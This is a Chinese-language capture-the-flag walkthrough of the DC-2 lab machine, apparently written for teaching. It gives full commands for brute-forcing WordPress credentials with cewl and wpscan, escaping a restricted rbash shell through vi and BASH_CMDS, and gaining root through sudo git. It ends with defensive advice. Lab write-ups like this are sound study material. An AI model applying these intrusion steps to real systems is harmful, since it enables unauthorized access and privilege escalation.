DC-2 靶场完整解析与复现教学文档<\/h1>

环境准备<\/h2>

网络配置<\/h3>

攻击机<\/strong>: Kali Linux，NAT模式<\/li>
靶机<\/strong>: DC-2，NAT模式<\/li>
网段<\/strong>: 192.168.200.0\/24<\/li>

要求<\/strong>: 确保攻击机和靶机在同一网段<\/li> <\/ul>
必要工具<\/h3>

nmap\/arp-scan - 主机发现<\/li>
cewl - 网站字典生成<\/li>
dirb\/dirsearch - 目录扫描<\/li>
wpscan - WordPress漏洞扫描<\/li>
git - 提权工具<\/li> <\/ul>
信息收集阶段<\/h2>
1. 主机发现<\/h3>
nmap -sP 192.168.200.0\/24 <\/span><\/span># 或<\/span> <\/span><\/span>arp-scan -l <\/span><\/span><\/code><\/pre>2. 解决重定向问题<\/h3> 编辑本地hosts文件添加DNS解析：<\/p> vim \/etc\/hosts <\/span><\/span># 添加以下内容<\/span> <\/span><\/span>192.168.200.x dc-2 <\/span><\/span><\/code><\/pre>初始访问<\/h2> 1. 使用cewl生成密码字典<\/h3> cewl http:\/\/dc-2 -w passwd.txt -d 3<\/span> -m 5<\/span> <\/span><\/span># 参数说明：<\/span> <\/span><\/span># -w 输出文件<\/span> <\/span><\/span># -d 爬取深度(默认2)<\/span> <\/span><\/span># -m 最小单词长度(默认3)<\/span> <\/span><\/span><\/code><\/pre>2. 目录扫描<\/h3> dirb http:\/\/dc-2 <\/span><\/span># 发现WordPress后台及其他目录<\/span> <\/span><\/span><\/code><\/pre>3. WordPress用户枚举<\/h3> wpscan --url http:\/\/dc-2\/ -e u <\/span><\/span># 保存用户名为user.txt<\/span> <\/span><\/span><\/code><\/pre>4. 密码爆破<\/h3> wpscan --url http:\/\/dc-2\/ -U user.txt -P passwd.txt <\/span><\/span># 成功爆破出jerry和tom的凭证<\/span> <\/span><\/span><\/code><\/pre>权限提升路径<\/h2> 1. 通过WordPress后台获取flag<\/h3> 使用tom\/jerry凭证登录后台<\/li> 发现flag1和flag2提示： If you can't exploit WordPress and take a shortcut, there is another way. Hope you found another entry point. <\/code><\/pre> <\/li> <\/ul> 2. 发现SSH服务(端口7744)<\/h3> ssh tom@dc-2 -p 7744<\/span> <\/span><\/span># 使用爆破得到的密码登录<\/span> <\/span><\/span><\/code><\/pre>3. 受限环境(rbash)突破<\/h3> compgen -c # 查看可用命令<\/span> <\/span><\/span>vi # 发现vi可用<\/span> <\/span><\/span> <\/span><\/span># 在vi中提权：<\/span> <\/span><\/span>:set shell=<\/span>\/bin\/sh <\/span><\/span>:shell <\/span><\/span> <\/span><\/span># 或者通过环境变量绕过：<\/span> <\/span><\/span>export -p # 查看环境变量<\/span> <\/span><\/span>BASH_CMDS[<\/span>a]=<\/span>\/bin\/sh;a <\/span><\/span>\/bin\/bash <\/span><\/span>export PATH=<\/span>$PATH:\/bin\/ <\/span><\/span>export PATH=<\/span>$PATH:\/usr\/bin <\/span><\/span><\/code><\/pre>4. 发现flag3<\/h3> poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes. <\/code><\/pre> 5. 切换用户<\/h3> su jerry <\/span><\/span># 查看jerry目录下的flag4.txt：<\/span> <\/span><\/span>Good to see that you've made it this far - but you'<\/span>re not home yet. <\/span><\/span>You still need to get the final flag (<\/span>the only flag that really counts!!!)<\/span> <\/span><\/span>No hints here - you'<\/span>re on your own now. <\/span><\/span>Go on - git outta here!!!! <\/span><\/span><\/code><\/pre>6. Git提权获取root权限<\/h3> sudo -l # 查看可用sudo命令<\/span> <\/span><\/span># 发现git可以以root权限运行<\/span> <\/span><\/span> <\/span><\/span># 方法1：<\/span> <\/span><\/span>sudo git help config <\/span><\/span># 在末行命令模式输入：<\/span> <\/span><\/span>!\/bin\/bash <\/span><\/span> <\/span><\/span># 方法2：<\/span> <\/span><\/span>sudo git -p help <\/span><\/span>!\/bin\/bash <\/span><\/span><\/code><\/pre>7. 获取最终flag<\/h3> cd \/root <\/span><\/span>cat final-flag.txt <\/span><\/span><\/code><\/pre>技术总结<\/h2> DNS重定向处理<\/strong> - 通过修改hosts文件解决域名解析问题<\/li> 密码字典生成<\/strong> - 使用cewl从网站内容生成针对性字典<\/li> WordPress枚举与爆破<\/strong> - wpscan工具的高效利用<\/li> 受限shell突破<\/strong> - 通过环境变量和可用命令绕过rbash限制<\/li> 特权提升技术<\/strong> - 利用sudo git的权限实现root提权<\/li> <\/ol> 参考资源<\/h2> CSDN文章参考<\/a><\/li> 提权手段详解<\/a><\/li> <\/ol> 防御建议<\/h2> 限制WordPress用户枚举<\/li> 使用强密码策略<\/li> 限制sudo权限<\/li> 对敏感命令进行监控<\/li> 及时更新WordPress及插件<\/li> <\/ol>